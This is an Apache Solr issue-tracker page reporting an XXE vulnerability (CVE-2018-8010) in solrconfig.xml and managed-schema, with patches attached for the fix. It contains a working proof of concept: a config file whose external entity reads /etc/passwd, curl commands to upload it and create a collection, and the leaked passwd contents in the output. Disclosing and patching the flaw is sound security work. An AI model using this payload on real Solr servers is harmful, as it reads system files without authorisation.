Uploaded image for project: 'Solr'
  1. Solr
  2. SOLR-12316

CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

    XMLWordPrintableJSON

    Details

      Description

      While trying to work around the issue of being unable to upload large files to ZK (without jute.maxbuffer setting), ananthesh brought to my notice that he was able to successfully achieve that using XXE. That alarmed me! Our managed-schema and solrconfig.xml parse XXEs!

      Here's a very nasty attack I could execute using this and configset upload functionality:

      Step 1: Create a configset with just two files in a directory called "minimal":

      schema.xml:

      <schema name="minimal" version="1.1">
        <fieldType name="string" class="solr.StrField"/>
        <dynamicField name="*" type="string" indexed="true" stored="true"/>
      </schema>
      

      solrconfig.xml

      <?xml version="1.0" ?>
      
      <!DOCTYPE doc [
      <!ENTITY passwdFile SYSTEM "file:///etc/passwd">
      ]>
      <config>
        <dataDir>${solr.data.dir:}</dataDir>
        <directoryFactory name="DirectoryFactory"
                          class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
        <schemaFactory class="ClassicIndexSchemaFactory"/>
      
        <luceneMatchVersion>7.3.0</luceneMatchVersion>
        <updateHandler class="solr.DirectUpdateHandler2">
          <commitWithin>
            <softCommit>${solr.commitwithin.softcommit:true}</softCommit>
          </commitWithin>
        </updateHandler>
        <requestHandler name="/select" class="solr.SearchHandler">
          <lst name="defaults">
            <str name="echoParams">explicit</str>
            <str name="indent">true</str>
            <str name="df">text</str>
            <str name="password">&passwdFile;</str>
          </lst>
        </requestHandler>
      </config>
      

      Step 2: Upload the minimal directory to Solr using configset upload API:

      [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header "Content-Type:application/octet-stream" --data-binary @- "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset"
        adding: schema.xml (deflated 42%)
        adding: solrconfig.xml (deflated 50%)
      {
        "responseHeader":{
          "status":0,
          "QTime":23}}
      

      Step 3: Create a collection using this configset

      [ishan@x260 solr] $ curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset"
      {
        "responseHeader":{
          "status":0,
          "QTime":3431},
        "success":{
          "192.168.1.6:8983_solr":{
            "responseHeader":{
              "status":0,
              "QTime":2062},
            "core":"mybadcoll_shard1_replica_n1"}}}
      

      Step 4: Use Config API to check the select handler's config. The file is revealed!

      [ishan@x260 solr] $ curl "http://localhost:8983/solr/mybadcoll/config/requestHandler"|jq
        % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                       Dload  Upload   Total   Spent    Left  Speed
      100  7939  100  7939    0     0   7939      0  0:00:01 --:--:--  0:00:01  323k
      {
        "responseHeader": {
          "status": 0,
          "QTime": 16
        },
        "config": {
          "requestHandler": {
            "/select": {
              "name": "/select",
              "class": "solr.SearchHandler",
              "defaults": {
                "echoParams": "explicit",
                "indent": "true",
                "df": "text",
                "password": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\npolkitd:x:998:997:User for polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin\nradvd:x:75:75:radvd user:/:/sbin/nologin\nqemu:x:107:107:qemu user:/:/sbin/nologin\napache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin\ncolord:x:995:990:User for colord:/var/lib/colord:/sbin/nologin\nabrt:x:173:173::/etc/abrt:/sbin/nologin\nsaslauth:x:994:76:Saslauthd user:/run/saslauthd:/sbin/nologin\nopenvpn:x:993:988:OpenVPN:/etc/openvpn:/sbin/nologin\nnm-openvpn:x:992:987:Default user for running openvpn spawned by NetworkManager:/:/sbin/nologin\ngdm:x:42:42::/var/lib/gdm:/sbin/nologin\nsetroubleshoot:x:991:985::/var/lib/setroubleshoot:/sbin/nologin\nrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin\nnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin\nnm-openconnect:x:990:984:NetworkManager user for OpenConnect:/:/sbin/nologin\ngnome-initial-setup:x:989:983::/run/gnome-initial-setup/:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\nishan:x:1000:1000:Ishan Chattopadhyaya:/home/ishan:/bin/bash\nsystemd-coredump:x:982:982:systemd Core Dumper:/:/sbin/nologin\nakmods:x:981:981:User is used by akmods to build akmod packages:/var/cache/akmods/:/sbin/nologin\nkube:x:980:978:Kubernetes user:/:/sbin/nologin\nzookeeper:x:979:977:ZooKeeper service account:/var/lib/zookeeper:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nautossh:x:977:975:autossh service account:/etc/autossh:/usr/sbin/nologin\nnginx:x:976:974:Nginx web server:/var/lib/nginx:/sbin/nologin\ngluster:x:975:972:GlusterFS daemons:/run/gluster:/sbin/nologin\npipewire:x:974:971:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin\nunbound:x:973:970:Unbound DNS resolver:/etc/unbound:/sbin/nologin\nnetdata:x:972:969:NetData User:/var/lib/netdata:/sbin/nologin\ndnsmasq:x:967:967:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin\n"
              }
      

        Attachments

        1. SOLR-12316-testfix.patch
          3 kB
          Uwe Schindler
        2. SOLR-12316.patch
          4 kB
          Uwe Schindler
        3. SOLR-12316.patch
          4 kB
          Uwe Schindler
        4. SOLR-12316.patch
          4 kB
          Uwe Schindler
        5. SOLR-12316.patch
          2 kB
          Uwe Schindler
        6. solr.log
          14 kB
          Ishan Chattopadhyaya
        7. SOLR-12316.patch
          1 kB
          Ishan Chattopadhyaya

          Activity

            People

            • Assignee:
              uschindler Uwe Schindler
              Reporter:
              ichattopadhyaya Ishan Chattopadhyaya
            • Votes:
              0 Vote for this issue
              Watchers:
              7 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: